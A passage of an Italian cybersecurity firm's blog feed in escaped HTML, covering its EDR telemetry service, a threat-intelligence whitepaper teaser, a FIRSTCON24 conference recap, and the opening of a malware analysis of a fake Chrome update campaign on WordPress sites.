&lt;li&gt;Raccolta: Certego raccoglie o dati di telemetria grezza dagli endpoint tramite integrazioni con le soluzioni EDR.&lt;/li&gt;
&lt;li&gt;Integrazione: La telemetria viene trasmessa in tempo reale alla piattaforma PanOptikon®, dove vengono applicate le regole di Threat Intelligence per la correlazione degli eventi.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analisi e correlazione&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Certego analizza sia gli avvisi di prodotto degli EDR che la telemetria grezza degli endpoint con il proprio motore di rilevamento. Questo motore utilizza migliaia di casi d&apos;uso di analisi comportamentale per identificare e correlare le minacce.&lt;/li&gt;
&lt;li&gt;Il team di Security Operations di Certego, operativo 24/7, analizza le informazioni correlate per confermare le minacce ed eliminare i falsi positivi.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Gestione degli avvisi&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Una volta che gli avvisi sono stati correlati e analizzati, la piattaforma PanOptikon® comunica le minacce confermate ai clienti, fornendo loro il contesto necessario per comprendere e rispondere efficacemente agli incidenti di sicurezza. Questo processo aiuta a ridurre il carico di lavoro dei team di sicurezza interni e a migliorare la tempestività delle risposte.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Miglioramento continuo&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Certego supporta le organizzazioni nella distribuzione, configurazione e aggiornamento delle policy per i sensori EDR. Questo continuo miglioramento e adattamento delle policy garantisce che le misure di sicurezza siano sempre aggiornate e ottimizzate per affrontare le minacce emergenti.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In Certego sfruttiamo la telemetria degli endpoint per fornire una visione completa e in tempo reale delle attività e dello stato di sicurezza dei dispositivi, migliorando la capacità delle organizzazioni di rilevare, analizzare e rispondere alle minacce informatiche.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Giugno 2024]]></description><link>https://www.certego.net/blog/whitepaper-giugno-2024-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-giugno-2024-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Tue, 02 Jul 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di giugno 2024, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[#FIRSTCON24 Fukuoka]]></title><description><![CDATA[Il viaggio di Certego alla conferenza del FIRST]]></description><link>https://www.certego.net/blog/firstcon-il-viaggio-di-certego-alla-conferenza-del-first/</link><guid isPermaLink="false">firstcon-il-viaggio-di-certego-alla-conferenza-del-first</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Wed, 26 Jun 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nei giorni scorsi, una numerosa delegazione di Certego ha partecipato alla trentaseiesima edizione del &lt;strong&gt;FIRSTCON&lt;/strong&gt;, il principale evento internazionale organizzato dal &lt;strong&gt;FIRST&lt;/strong&gt; (global Forum of Incident Response and Security Teams), tenutosi quest’anno a &lt;strong&gt;Fukuoka&lt;/strong&gt;, in Giappone, dal 9 al 14 giugno.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certego è stata selezionata tra le aziende che hanno partecipato in qualità di speaker alla conferenza&lt;/strong&gt;: Matteo Lodi, Threat Intelligence Team Leader di Certego, e Simone Berni, Threat Intelligence Engineer di Certego, hanno tenuto un intervento di 50 minuti per presentare alla platea internazionale &lt;strong&gt;IntelOwl, la piattaforma di Threat Intelligence di Certego&lt;/strong&gt;, integrata all’interno della nostra piattaforma di Unified Security Operations, PanOptikon®, che facilita il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l&apos;efficienza delle operazioni di Detection, Analysis e Incident Response.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/e1596/Fukuoka3.jpg&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAPABQDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAgQA/8QAFAEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAABnpiIjHD/AP/EABoQAAMBAAMAAAAAAAAAAAAAAAECAwARIjH/2gAIAQEAAQUCTxUBWid6UA3IKGgG/8QAFhEBAQEAAAAAAAAAAAAAAAAAARAR/9oACAEDAQE/AU2f/8QAFhEBAQEAAAAAAAAAAAAAAAAAARAR/9oACAECAQE/ARyf/8QAGhAAAgIDAAAAAAAAAAAAAAAAAAECIRARIv/aAAgBAQAGPwKjqNjEkjax/8QAGhAAAwEBAQEAAAAAAAAAAAAAAAERIVFBYf/aAAgBAQABPyGq+ulMp0Zi8FqJ9wyiNrBwk7Yf/9oADAMBAAIAAwAAABAwz//EABgRAAIDAAAAAAAAAAAAAAAAAAABEUFR/9oACAEDAQE/ENxCtn//xAAXEQEBAQEAAAAAAAAAAAAAAAABABFB/9oACAECAQE/EHFrwv/EABoQAQEBAQEBAQAAAAAAAAAAAAERACExcaH/2gAIAQEAAT8QE0VF4GT7hVAVnZiCOJP3DsD29PvMMkY6PHAgoLN//9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 3&quot; title=&quot;&quot; src=&quot;/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/ac99c/Fukuoka3.jpg&quot; srcset=&quot;/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/4ecad/Fukuoka3.jpg 384w,
/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/212bf/Fukuoka3.jpg 768w,
/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/ac99c/Fukuoka3.jpg 1536w,
/website/static/777eeadbbbf91d4a3f8aaac8bcf82265/e1596/Fukuoka3.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
IntelOwl, disponibile anche nella sua versione Open Source, si conferma da numerosi anni uno dei principali progetti internazionali nel campo della Cyber Threat Intelligence. Con oltre 3.000 &quot;stars&quot; su GitHub, la piattaforma di Certego ha consolidato la sua reputazione nella community Open Source, in particolare per l&apos;analisi degli indicatori di compromissione (indirizzi IP, domini, hash, file).
&lt;p&gt;&lt;strong&gt;Il talk di Certego è stato uno dei più partecipati dell&apos;intera conferenza&lt;/strong&gt;, con 300 presenze, a dimostrazione del costante interesse verso la nostra soluzione proprietaria, che con le sue numerose release nel corso degli anni ha saputo confermarsi come progetto di punta nel suo campo.&lt;/p&gt;
&lt;p&gt;Durante i cinque giorni dell’evento, abbiamo avuto occasione di assistere a diversi talk interessanti che ci hanno fornito spunti di ricerca su tematiche come la sicurezza degli ambienti cloud, l’utilizzo di algoritmi di Intelligenza Artificiale e Machine Learning, l’automazione delle operazioni di risposta agli incidenti, l’approccio Zero Trust e molto altro.&lt;/p&gt;
&lt;p&gt;Oltre ad averci dato la possibilità di presentare la nostra soluzione, la conferenza è stata l&apos;occasione per rincontrare amici di lunga data, esperti di cybersecurity e connetterci e scambiare idee con professionisti internazionali della comunità di Incident Responder sulle sfide della sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Questa filosofia di cooperazione, che da oltre undici anni rappresenta un tratto distintivo di Certego, non solo arricchisce le nostre competenze e capacità, ma contribuisce anche a consolidare la comunità globale della sicurezza, sviluppando un ecosistema più robusto e resistente alle minacce del cybercrime.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/2a475ee7acbc838cc4685408c0979e01/e1596/Fukuoka1.jpg&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 133.33333333333331%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAMEAv/EABYBAQEBAAAAAAAAAAAAAAAAAAEAAv/aAAwDAQACEAMQAAABjohrxoxkd26Ggr//xAAcEAACAgIDAAAAAAAAAAAAAAAAAQIDERIUMUL/2gAIAQEAAQUCqcmN6nLwU2KBc81kkT3sUIpL1HtvB//EABQRAQAAAAAAAAAAAAAAAAAAACD/2gAIAQMBAT8BH//EABURAQEAAAAAAAAAAAAAAAAAABEg/9oACAECAQE/ASP/xAAdEAACAQQDAAAAAAAAAAAAAAAAASECEBExAxJB/9oACAEBAAY/ApJg8HnMCyrcnXbKKatI0O//xAAdEAADAQACAwEAAAAAAAAAAAAAAREhMVFBcYGR/9oACAEBAAE/IezbkHYX6FGL8JiJ9OGYIahXVfRPSIR1cWLRUDtsJWPo8ici8UZwP//aAAwDAQACAAMAAAAQlwmy/8QAFxEAAwEAAAAAAAAAAAAAAAAAAAERQf/aAAgBAwEBPxB2EEsIf//EABgRAQEAAwAAAAAAAAAAAAAAAAABESEx/9oACAECAQE/EDFmlrr/xAAjEAEAAgIABAcAAAAAAAAAAAABABEhMVFhcYFBkaGx0eHw/9oACAEBAAE/EHUo2lGWKXGGhTDol2EL4are2s+cuerwDiz+I3d8h+peCqANBlyMBAoUG3OMe0uPA8HiC+tzgDT3s+WdJIroxAEBQ6J//9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/2a475ee7acbc838cc4685408c0979e01/ac99c/Fukuoka1.jpg&quot; srcset=&quot;/website/static/2a475ee7acbc838cc4685408c0979e01/4ecad/Fukuoka1.jpg 384w,
/website/static/2a475ee7acbc838cc4685408c0979e01/212bf/Fukuoka1.jpg 768w,
/website/static/2a475ee7acbc838cc4685408c0979e01/ac99c/Fukuoka1.jpg 1536w,
/website/static/2a475ee7acbc838cc4685408c0979e01/e1596/Fukuoka1.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
Naturalmente, non abbiamo potuto fare a meno di immergerci nella cultura giapponese, che non stancherà mai di affascinarci, con una passione per il sushi, videogames e ukiyo-e!
&lt;p&gt;&lt;strong&gt;Siamo entusiasti all&apos;idea di partecipare alle nuove iniziative del FIRST, dove avremo l&apos;opportunità di condividere le nostre soluzioni proprietarie con esperti internazionali. Questo scambio di conoscenze e innovazioni rafforza ulteriormente il ruolo di Certego come leader nel settore, confermando la nostra unicità e il nostro impegno nell&apos;eccellenza tecnologica&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/392ffa2b68bb512625fa7aa5e91b402e/e1596/Fukuoka2.jpg&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAPABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAMBBAX/xAAVAQEBAAAAAAAAAAAAAAAAAAACAP/aAAwDAQACEAMQAAABdax0mkQF/wD/xAAbEAACAwADAAAAAAAAAAAAAAABAwACEhETIv/aAAgBAQABBQJFhSbUYwe3sM7Ri1+T/8QAFxEBAAMAAAAAAAAAAAAAAAAAAQIQEf/aAAgBAwEBPwFhrX//xAAWEQEBAQAAAAAAAAAAAAAAAAACECH/2gAIAQIBAT8BKyf/xAAeEAACAQMFAAAAAAAAAAAAAAAAAQIQESESMTJBgf/aAAgBAQAGPwJ6jkvaJR6LS3MLB//EABkQAQEBAAMAAAAAAAAAAAAAABEBACExQf/aAAgBAQABPyFKohRya2cmurh8CVkYXPJqtOxBu//aAAwDAQACAAMAAAAQ9P8A/8QAFhEAAwAAAAAAAAAAAAAAAAAAAAER/9oACAEDAQE/EFUKj//EABYRAQEBAAAAAAAAAAAAAAAAAAEAEf/aAAgBAgEBPxBDFjf/xAAbEAEBAAIDAQAAAAAAAAAAAAABEQBBITFRof/aAAgBAQABPxDiTkAxvzCQuKCH3DzAen3WcHugss3i7SA2hhYWAJXP/9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 2&quot; title=&quot;&quot; src=&quot;/website/static/392ffa2b68bb512625fa7aa5e91b402e/ac99c/Fukuoka2.jpg&quot; srcset=&quot;/website/static/392ffa2b68bb512625fa7aa5e91b402e/4ecad/Fukuoka2.jpg 384w,
/website/static/392ffa2b68bb512625fa7aa5e91b402e/212bf/Fukuoka2.jpg 768w,
/website/static/392ffa2b68bb512625fa7aa5e91b402e/ac99c/Fukuoka2.jpg 1536w,
/website/static/392ffa2b68bb512625fa7aa5e91b402e/e1596/Fukuoka2.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/e1596/Fukuoka6.jpg&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 133.59375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAMEBQH/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAABuVlPLhBE6aZTROi//8QAHRAAAgMAAgMAAAAAAAAAAAAAAQIDERIAEwQyM//aAAgBAQABBQJZVI7W20j6II5eZWdblRlJvXRfPM9T8Qxr/8QAFxEAAwEAAAAAAAAAAAAAAAAAABARIf/aAAgBAwEBPwGKmn//xAAXEQEAAwAAAAAAAAAAAAAAAAAAECEx/9oACAECAQE/AYxT/8QAHxAAAQMDBQAAAAAAAAAAAAAAAAECQRAhMgMRIjFh/9oACAEBAAY/AuzHiLsthBtqQNSXSZDTSX2n/8QAHRABAAMAAgMBAAAAAAAAAAAAAQARIUFhUYGRof/aAAgBAQABPyE9g6ZVvXm/2ZYA5LZUOYIBTLekDxLZfvHeBClXB07Y+4Y+znp//9oADAMBAAIAAwAAABCg0PH/xAAZEQACAwEAAAAAAAAAAAAAAAAAEQEQIVH/2gAIAQMBAT8QlK0Lo//EABgRAQADAQAAAAAAAAAAAAAAAAEAEBFR/9oACAECAQE/EB2kjeZ//8QAHRABAQACAgMBAAAAAAAAAAAAAREAIUFRMWGBof/aAAgBAQABPxCiN1tjl6dJ0Hp1ko0CA2d47uWwGveKSB1LaV+bxD3Wok9ZpvFWsLm0aFulXjjXrFAUfGFrb83zEDcddbYw38mf/9k=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 6&quot; title=&quot;&quot; src=&quot;/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/ac99c/Fukuoka6.jpg&quot; srcset=&quot;/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/4ecad/Fukuoka6.jpg 384w,
/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/212bf/Fukuoka6.jpg 768w,
/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/ac99c/Fukuoka6.jpg 1536w,
/website/static/d1bc889e7356e3d0d1c1d4eee7f471bf/e1596/Fukuoka6.jpg 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Malware Analysis]]></title><description><![CDATA[Fake Update di Google Chrome utilizzato per distribuire Infostealer sfruttando siti WordPress]]></description><link>https://www.certego.net/blog/malware-analysis-fake-update-google-chrome-utilizzato-per-distribuire-infostealer-sfruttando-siti-wordpress/</link><guid isPermaLink="false">malware-analysis-fake-update-google-chrome-utilizzato-per-distribuire-infostealer-sfruttando-siti-wordpress</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Mon, 10 Jun 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Authors: Luca Testoni, Marco Giovanetti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1-introduzione&quot;&gt;Introduzione&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-contesto-di-riferimento&quot;&gt;Contesto di riferimento&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-strmenti-di-analisi-utilizzati&quot;&gt;Strumenti di analisi utilizzati&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-analisi-effettuate&quot;&gt;Analisi effettuate&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#kill-chain&quot;&gt;4.1 Kill Chain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#analisi-dell-applicazione-web&quot;&gt;4.2 Analisi dell&apos;applicazione web&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-IOCs&quot;&gt;IOCs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#6-TTPs&quot;&gt;TTPs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#7-references&quot;&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;1. Introduzione &lt;a id=&quot;1-introduzione&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Nell’attuale contesto della cybersecurity, è sempre più necessario dotare le infrastrutture aziendali di servizi gestiti per il monitoraggio 24/7.&lt;/p&gt;
&lt;p&gt;Questo approccio non è solo una misura di sicurezza, ma una vera e propria necessità per garantire una protezione continua e tempestiva contro le minacce informatiche: la sorveglianza costante permette di rilevare e rispondere rapidamente a qualsiasi attività sospetta, minimizzando i rischi di compromissione e perdita di dati.&lt;/p&gt;
&lt;h2&gt;2. Contesto di riferimento &lt;a id=&quot;2-contesto-di-riferimento&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Recentemente, il nostro Incident Response Team (IRT) ha affrontato un caso interessante che mette in luce l&apos;importanza del monitoraggio 24/7.&lt;/p&gt;
&lt;p&gt;Un attaccante è riuscito a compromettere il portale di un sito web di servizi, inserendo al suo interno un modale ingannevole che cercava di persuadere i visitatori a scaricare un finto aggiornamento del browser Chrome.&lt;/p&gt;
&lt;p&gt;La trappola era ben congegnata: una volta che l&apos;utente cliccava per procedere al finto aggiornamento, veniva avviata una catena di attacco (kill chain) che portava all’esecuzione di un malware di tipo infostealer sul client della vittima. Questa tecnica di attacco, nota come &quot;Fake Update&quot;[1], è progettata per rubare informazioni sensibili dall&apos;utente ignaro.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 584px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/e9217276abb85b970c87063593ff4778/e05eb/ChromeInfostealer1.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 46.35416666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABYlAAAWJQFJUiTwAAAB/klEQVR42k1OS08TYRSdv2K0jX9AZEFDCAsXiisW7iwmNCbURzVEMUIfllqMJi0ltiKCtBU6rc0gol34iIlr1wIz37w68w3TeTSdwXbaMv0ciiTenJzcc+45ycVSsVl/4PnYzM7YvfKV6a3Ljz4N+8seX8Hjw4d8Rc+traEpYvAGPjiBX/TiA178wvXCwCQxPIWH7k5gd+LZa8nKaOLw0kt7dLEzkmifj1hng5YrZJ1zMNd0BVuusOUOW64+3JG2O9w6E+xOem9iOxtpaCIg6ECsM5LBSA2h1pAUU6wZUDUdOBIqJ2zAvi/IDdU8SgQD2NfcomGaHNjjGFKWBE2RHFZrkq7WdFVWZKkmi4oMRYE/gFVNcRzIM5SmKunYA2w79aTV6VIkCQAQRMjz1X2S5HieZVmGZQGgWY7fIymG46vVKoSSIAh6vY4QyrwIY9tL8+af5u7ub4ZhnDtFUSRFssc1QAFa5ChN3NcPaF0CNA0Mw7Qsq91uO+VXyShGJKPOZts2Op1Op2P1Iwj1fkF0u4ICFRT/iY5OI71ez+HlVBzbWHh8rP8rN5tNTa+rmvOb/Z1GV/NovID8H1HXPmn+i2WSMWx2fORN6H52fmY9+jD7bO7d0tP3uTSBrxGbK8X88ufSyo8Pq9+I1S+lDL6eKeZflzbXysV87m1mITL9Fxc3nEzeePJqAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Chrome Screenshot&quot; title=&quot;&quot; src=&quot;/website/static/e9217276abb85b970c87063593ff4778/e05eb/ChromeInfostealer1.png&quot; srcset=&quot;/website/static/e9217276abb85b970c87063593ff4778/804b2/ChromeInfostealer1.png 384w,
/website/static/e9217276abb85b970c87063593ff4778/e05eb/ChromeInfostealer1.png 584w&quot; sizes=&quot;(max-width: 584px) 100vw, 584px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1154px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/f9851e36b23364571700dcaacd0fe7ed/0940f/ChromeInfostealer2.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 68.48958333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABYlAAAWJQFJUiTwAAAClUlEQVR42k2Rz0/UQBTHe/UqxosXr95M9OLVi3+AJsaIR/VgDMR480BCIMZEEIxK9CTBmBg9AIkxWfagAguy7G5b+gt2u7SdTtuZbsv+otvddjtOFwh88/LynZl+Ou+9YT59/fN86vfDj+XHc/KjOYXGnVfcvWlxeEYanpVp3J+RaAzPyMcxKz+Yle9OKR8WWebW2NLtyeVrE80bL/3rEwdXx/2Lz9zzI3hoJM1HZmj0jB9xL4yic0/8m+MSs5BhFY/kq2FR79Fc0Lqs0eXNiGYO9Aamd+r11JT0sFon77+vMut5runjsiJU9iQPQWQZFtCQBTxk1ZCFLWCBfWQDaFShoWIHetgxtEodwx8/s8xGYafdbGm6oRuGZdmmhaDlOA62bQchDKF1lOkRQsjBrm4AGoSQxczfFMaOxXF8uVzR9itIlzSFlSWZ53lJkjiOEwRBFKmVRGHHNK1ms+n7PoWXs2vMRlHohoHt4Hbd23PCFyvJAhuTJB6of6qTNcWiOD6GN4tCHHWxW2v4NdVuza0ffvuHu2Gn0wmpOqkCaoIg6AyW7XabmhReWWNyBb7mokKhaEJ44NdanlkWWYyx69ZoedTQAdQ8D0JIW7YdB5ig3mgM4FUmt81DU9/K59Wqquu6ZgBoO9Wqahh6EBz2umHYTW/v9xNyotOyac9h0Ka/RBibAFg2HS8CAGga1HUHGDadO322OOpRIBkois7A1MWDSZxVvUFcN9Es8otNtk0ioCSMkiM8iiL6wVJmldksiSkcn8KtVtOjHXs1QvpZlVx6Ta68JZeniYjTU1r+cdm058l387uqXuDlkrBbFHYLO8o2J+c5aYsVS6KSKynzK9LnjPQlK+WKUp6l+xJ9IEFRn469+Q/1+cM2LAHW9wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
